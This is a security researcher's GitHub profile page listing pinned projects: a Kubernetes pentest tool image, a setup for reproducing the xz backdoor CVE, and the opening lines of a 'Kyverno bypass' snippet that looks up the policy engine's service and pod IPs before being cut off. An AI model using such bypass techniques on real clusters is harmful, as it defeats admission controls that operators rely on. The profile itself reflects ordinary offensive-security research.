Skip to content
View r0binak's full-sized avatar
:electron:
whoami
:electron:
whoami

Highlights

  • Pro
Block or Report

Block or report r0binak

Report abuse

Contact GitHub support about this user’s behavior. Learn more about reporting abuse.

Report abuse
r0binak/README.md

About me

class DevSecOps:
    def __init__(self):
        self.name = "Sergey Kanibor"
        self.linkedin = "https://www.linkedin.com/in/r0binak/"
        self.email = "r081n4k@gmail.com"
        self.area = "Cloud & Container security, Pentest Web, Infra, Bug Hunter"

if __name__ == "__main__":
    r0binak = DevSecOps()

Pinned Loading

  1. MTKPI MTKPI Public

    🧰 Multi Tool Kubernetes Pentest Image

    Shell 203 16

  2. xzk8s xzk8s Public

    Dockerfile and Kubernetes manifests for reproduce CVE-2024-3094

    Dockerfile 9

  3. Kyverno bypass Kyverno bypass
    1
    SVCIP="$(kubectl get svc -n kyverno kyverno-svc --output jsonpath='{.spec.clusterIP}')"
    2
    PODNAME="$(kubectl get pod -n kyverno -l app.kubernetes.io/component=admission-controller --output name | sed -e 's/^pod\///g')"
    3
    PODIP="$(kubectl get pod -n kyverno $PODNAME --output jsonpath='{.status.podIP}')"
    4
    
                  
    5
    kubectl apply -f - <<EOF